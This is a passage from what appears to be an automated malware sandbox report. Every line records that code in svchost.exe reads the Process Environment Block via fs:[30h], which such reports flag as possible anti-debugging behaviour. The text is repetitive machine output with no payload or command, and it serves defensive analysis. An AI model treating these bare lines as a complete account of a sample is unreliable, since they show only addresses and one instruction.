                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036403E9 mov eax, dword ptr fs:[00000030h]3_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036403E9 mov eax, dword ptr fs:[00000030h]3_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036403E9 mov eax, dword ptr fs:[00000030h]3_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036403E9 mov eax, dword ptr fs:[00000030h]3_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036403E9 mov eax, dword ptr fs:[00000030h]3_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036403E9 mov eax, dword ptr fs:[00000030h]3_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E3F0 mov eax, dword ptr fs:[00000030h]3_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E3F0 mov eax, dword ptr fs:[00000030h]3_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E3F0 mov eax, dword ptr fs:[00000030h]3_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036663FF mov eax, dword ptr fs:[00000030h]3_2_036663FF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EC3CD mov eax, dword ptr fs:[00000030h]3_2_036EC3CD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A3C0 mov eax, dword ptr fs:[00000030h]3_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A3C0 mov eax, dword ptr fs:[00000030h]3_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A3C0 mov eax, dword ptr fs:[00000030h]3_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A3C0 mov eax, dword ptr fs:[00000030h]3_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A3C0 mov eax, dword ptr fs:[00000030h]3_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A3C0 mov eax, dword ptr fs:[00000030h]3_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036383C0 mov eax, dword ptr fs:[00000030h]3_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036383C0 mov eax, dword ptr fs:[00000030h]3_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036383C0 mov eax, dword ptr fs:[00000030h]3_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036383C0 mov eax, dword ptr fs:[00000030h]3_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B63C0 mov eax, dword ptr fs:[00000030h]3_2_036B63C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE3DB mov eax, dword ptr fs:[00000030h]3_2_036DE3DB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE3DB mov eax, dword ptr fs:[00000030h]3_2_036DE3DB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE3DB mov ecx, dword ptr fs:[00000030h]3_2_036DE3DB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE3DB mov eax, dword ptr fs:[00000030h]3_2_036DE3DB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D43D4 mov eax, dword ptr fs:[00000030h]3_2_036D43D4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D43D4 mov eax, dword ptr fs:[00000030h]3_2_036D43D4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362E388 mov eax, dword ptr fs:[00000030h]3_2_0362E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362E388 mov eax, dword ptr fs:[00000030h]3_2_0362E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362E388 mov eax, dword ptr fs:[00000030h]3_2_0362E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365438F mov eax, dword ptr fs:[00000030h]3_2_0365438F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365438F mov eax, dword ptr fs:[00000030h]3_2_0365438F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03628397 mov eax, dword ptr fs:[00000030h]3_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03628397 mov eax, dword ptr fs:[00000030h]3_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03628397 mov eax, dword ptr fs:[00000030h]3_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03634260 mov eax, dword ptr fs:[00000030h]3_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03634260 mov eax, dword ptr fs:[00000030h]3_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03634260 mov eax, dword ptr fs:[00000030h]3_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362826B mov eax, dword ptr fs:[00000030h]3_2_0362826B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E0274 mov eax, dword ptr fs:[00000030h]3_2_036E0274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B8243 mov eax, dword ptr fs:[00000030h]3_2_036B8243
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B8243 mov ecx, dword ptr fs:[00000030h]3_2_036B8243
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0370625D mov eax, dword ptr fs:[00000030h]3_2_0370625D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A250 mov eax, dword ptr fs:[00000030h]3_2_0362A250
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03636259 mov eax, dword ptr fs:[00000030h]3_2_03636259
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EA250 mov eax, dword ptr fs:[00000030h]3_2_036EA250
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EA250 mov eax, dword ptr fs:[00000030h]3_2_036EA250
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362823B mov eax, dword ptr fs:[00000030h]3_2_0362823B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036402E1 mov eax, dword ptr fs:[00000030h]3_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036402E1 mov eax, dword ptr fs:[00000030h]3_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036402E1 mov eax, dword ptr fs:[00000030h]3_2_036402E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A2C3 mov eax, dword ptr fs:[00000030h]3_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A2C3 mov eax, dword ptr fs:[00000030h]3_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A2C3 mov eax, dword ptr fs:[00000030h]3_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A2C3 mov eax, dword ptr fs:[00000030h]3_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363A2C3 mov eax, dword ptr fs:[00000030h]3_2_0363A2C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_037062D6 mov eax, dword ptr fs:[00000030h]3_2_037062D6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036402A0 mov eax, dword ptr fs:[00000030h]3_2_036402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036402A0 mov eax, dword ptr fs:[00000030h]3_2_036402A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov eax, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov ecx, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov eax, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov eax, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov eax, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C62A0 mov eax, dword ptr fs:[00000030h]3_2_036C62A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366E284 mov eax, dword ptr fs:[00000030h]3_2_0366E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366E284 mov eax, dword ptr fs:[00000030h]3_2_0366E284
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B0283 mov eax, dword ptr fs:[00000030h]3_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B0283 mov eax, dword ptr fs:[00000030h]3_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B0283 mov eax, dword ptr fs:[00000030h]3_2_036B0283
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704164 mov eax, dword ptr fs:[00000030h]3_2_03704164
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03704164 mov eax, dword ptr fs:[00000030h]3_2_03704164
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C4144 mov eax, dword ptr fs:[00000030h]3_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C4144 mov eax, dword ptr fs:[00000030h]3_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C4144 mov ecx, dword ptr fs:[00000030h]3_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C4144 mov eax, dword ptr fs:[00000030h]3_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C4144 mov eax, dword ptr fs:[00000030h]3_2_036C4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362C156 mov eax, dword ptr fs:[00000030h]3_2_0362C156
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C8158 mov eax, dword ptr fs:[00000030h]3_2_036C8158
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03636154 mov eax, dword ptr fs:[00000030h]3_2_03636154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03636154 mov eax, dword ptr fs:[00000030h]3_2_03636154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03660124 mov eax, dword ptr fs:[00000030h]3_2_03660124
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov ecx, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov ecx, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov ecx, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov eax, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DE10E mov ecx, dword ptr fs:[00000030h]3_2_036DE10E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DA118 mov ecx, dword ptr fs:[00000030h]3_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DA118 mov eax, dword ptr fs:[00000030h]3_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DA118 mov eax, dword ptr fs:[00000030h]3_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036DA118 mov eax, dword ptr fs:[00000030h]3_2_036DA118
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F0115 mov eax, dword ptr fs:[00000030h]3_2_036F0115
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_037061E5 mov eax, dword ptr fs:[00000030h]3_2_037061E5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036601F8 mov eax, dword ptr fs:[00000030h]3_2_036601F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F61C3 mov eax, dword ptr fs:[00000030h]3_2_036F61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F61C3 mov eax, dword ptr fs:[00000030h]3_2_036F61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE1D0 mov eax, dword ptr fs:[00000030h]3_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE1D0 mov eax, dword ptr fs:[00000030h]3_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE1D0 mov eax, dword ptr fs:[00000030h]3_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE1D0 mov eax, dword ptr fs:[00000030h]3_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03670185 mov eax, dword ptr fs:[00000030h]3_2_03670185
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EC188 mov eax, dword ptr fs:[00000030h]3_2_036EC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036EC188 mov eax, dword ptr fs:[00000030h]3_2_036EC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D4180 mov eax, dword ptr fs:[00000030h]3_2_036D4180
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D4180 mov eax, dword ptr fs:[00000030h]3_2_036D4180
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B019F mov eax, dword ptr fs:[00000030h]3_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B019F mov eax, dword ptr fs:[00000030h]3_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B019F mov eax, dword ptr fs:[00000030h]3_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B019F mov eax, dword ptr fs:[00000030h]3_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A197 mov eax, dword ptr fs:[00000030h]3_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A197 mov eax, dword ptr fs:[00000030h]3_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A197 mov eax, dword ptr fs:[00000030h]3_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0365C073 mov eax, dword ptr fs:[00000030h]3_2_0365C073
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03632050 mov eax, dword ptr fs:[00000030h]3_2_03632050
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B6050 mov eax, dword ptr fs:[00000030h]3_2_036B6050
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A020 mov eax, dword ptr fs:[00000030h]3_2_0362A020
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362C020 mov eax, dword ptr fs:[00000030h]3_2_0362C020
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C6030 mov eax, dword ptr fs:[00000030h]3_2_036C6030
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B4000 mov ecx, dword ptr fs:[00000030h]3_2_036B4000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D2000 mov eax, dword ptr fs:[00000030h]3_2_036D2000
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E016 mov eax, dword ptr fs:[00000030h]3_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E016 mov eax, dword ptr fs:[00000030h]3_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E016 mov eax, dword ptr fs:[00000030h]3_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E016 mov eax, dword ptr fs:[00000030h]3_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0362A0E3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036380E9 mov eax, dword ptr fs:[00000030h]3_2_036380E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B60E0 mov eax, dword ptr fs:[00000030h]3_2_036B60E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0362C0F0 mov eax, dword ptr fs:[00000030h]3_2_0362C0F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036720F0 mov ecx, dword ptr fs:[00000030h]3_2_036720F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B20DE mov eax, dword ptr fs:[00000030h]3_2_036B20DE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036280A0 mov eax, dword ptr fs:[00000030h]3_2_036280A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036C80A8 mov eax, dword ptr fs:[00000030h]3_2_036C80A8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F60B8 mov eax, dword ptr fs:[00000030h]3_2_036F60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F60B8 mov ecx, dword ptr fs:[00000030h]3_2_036F60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363208A mov eax, dword ptr fs:[00000030h]3_2_0363208A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03638770 mov eax, dword ptr fs:[00000030h]3_2_03638770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03640770 mov eax, dword ptr fs:[00000030h]3_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366674D mov esi, dword ptr fs:[00000030h]3_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366674D mov eax, dword ptr fs:[00000030h]3_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366674D mov eax, dword ptr fs:[00000030h]3_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03630750 mov eax, dword ptr fs:[00000030h]3_2_03630750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036BE75D mov eax, dword ptr fs:[00000030h]3_2_036BE75D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672750 mov eax, dword ptr fs:[00000030h]3_2_03672750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672750 mov eax, dword ptr fs:[00000030h]3_2_03672750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B4755 mov eax, dword ptr fs:[00000030h]3_2_036B4755
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366C720 mov eax, dword ptr fs:[00000030h]3_2_0366C720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366C720 mov eax, dword ptr fs:[00000030h]3_2_0366C720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366273C mov eax, dword ptr fs:[00000030h]3_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366273C mov ecx, dword ptr fs:[00000030h]3_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366273C mov eax, dword ptr fs:[00000030h]3_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AC730 mov eax, dword ptr fs:[00000030h]3_2_036AC730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366C700 mov eax, dword ptr fs:[00000030h]3_2_0366C700
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03630710 mov eax, dword ptr fs:[00000030h]3_2_03630710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03660710 mov eax, dword ptr fs:[00000030h]3_2_03660710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036527ED mov eax, dword ptr fs:[00000030h]3_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036527ED mov eax, dword ptr fs:[00000030h]3_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036527ED mov eax, dword ptr fs:[00000030h]3_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036BE7E1 mov eax, dword ptr fs:[00000030h]3_2_036BE7E1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036347FB mov eax, dword ptr fs:[00000030h]3_2_036347FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036347FB mov eax, dword ptr fs:[00000030h]3_2_036347FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363C7C0 mov eax, dword ptr fs:[00000030h]3_2_0363C7C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036B07C3 mov eax, dword ptr fs:[00000030h]3_2_036B07C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036307AF mov eax, dword ptr fs:[00000030h]3_2_036307AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036E47A0 mov eax, dword ptr fs:[00000030h]3_2_036E47A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036D678E mov eax, dword ptr fs:[00000030h]3_2_036D678E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F866E mov eax, dword ptr fs:[00000030h]3_2_036F866E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036F866E mov eax, dword ptr fs:[00000030h]3_2_036F866E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366A660 mov eax, dword ptr fs:[00000030h]3_2_0366A660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0366A660 mov eax, dword ptr fs:[00000030h]3_2_0366A660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03662674 mov eax, dword ptr fs:[00000030h]3_2_03662674
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364C640 mov eax, dword ptr fs:[00000030h]3_2_0364C640
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364E627 mov eax, dword ptr fs:[00000030h]3_2_0364E627
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03666620 mov eax, dword ptr fs:[00000030h]3_2_03666620
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03668620 mov eax, dword ptr fs:[00000030h]3_2_03668620
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0363262C mov eax, dword ptr fs:[00000030h]3_2_0363262C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE609 mov eax, dword ptr fs:[00000030h]3_2_036AE609
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0364260B mov eax, dword ptr fs:[00000030h]3_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03672619 mov eax, dword ptr fs:[00000030h]3_2_03672619
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE6F2 mov eax, dword ptr fs:[00000030h]3_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_036AE6F2 mov eax, dword ptr fs:[00000030h]3_2_036AE6F2
